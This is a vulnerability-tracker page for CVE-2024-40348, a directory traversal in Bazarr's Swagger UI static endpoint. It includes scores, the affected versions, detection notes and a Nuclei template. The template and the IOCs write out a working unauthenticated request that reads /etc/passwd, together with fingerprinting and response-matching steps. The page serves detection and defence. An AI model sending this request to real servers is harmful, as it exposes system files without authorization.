CVE-2024-40348
published 2024-07-20CVE-2024-40348: An issue in the component /api/swaggerui/static of Bazaar v1.4.3 allows unauthenticated attackers to execute a directory traversal.
PriorityP269high8.2CVSS 3.1
AVNACLPRNUINSUCHINAL
EXPLOIT
EPSS
8.29%
94.2th percentile
An issue in the component /api/swaggerui/static of Bazaar v1.4.3 allows unauthenticated attackers to execute a directory traversal.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| bazarr | bazarr | <= 1.4.3 | — |
Detection & IOCsextracted from sources · hover to see the quote
path/api/swaggerui/static/../../../../../../../../../../../../../../../../etc/passwd
yara
regex: root:.*:0:0:
- →Detect unauthenticated GET requests to /api/swaggerui/static containing path traversal sequences (e.g., ../../../../) targeting sensitive files such as /etc/passwd.
- →Responses to successful exploitation return HTTP 200 with Content-Type: application/octet-stream and a body matching the pattern root:.*:0:0: (Unix /etc/passwd content).
- →Fingerprint the target as Bazarr by checking for 'content="Bazarr', 'window.Bazarr', or similar strings in the response before triggering the traversal probe.
- ·The vulnerability affects Bazaar (Bazarr) v1.4.3 specifically; the traversal endpoint is unauthenticated, meaning no credentials or session tokens are required to exploit it. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Nuclei
Bazarr < 1.4.3 - Arbitrary File Read
nuclei·CVSS 8.2
CVE-2024-40348 [HIGH] Bazarr < 1.4.3 - Arbitrary File Read
Bazarr Bazarr"
- 'content="Bazarr'
- "window.Bazarr"
condition: or
internal: true
- method: GET
path:
- "{{BaseURL}}/api/swaggerui/static/../../../../../../../../../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0:"
- type: word
part: header
words:
- "application/octet-stream"
- type: status
status:
- 200
# digest: 490a00463044022042259c1ffb9695ed3218c8af65a2f4dbf0a236cd907c3739b02bc7aad823cb6902207f60bd216470e57752f2443715b264a0cf87c22049d8c1a620a5c2123dcf5130:922c64590222798bb761d5b6d8e72950
No writeups or analysis indexed.
2024-07-20
Published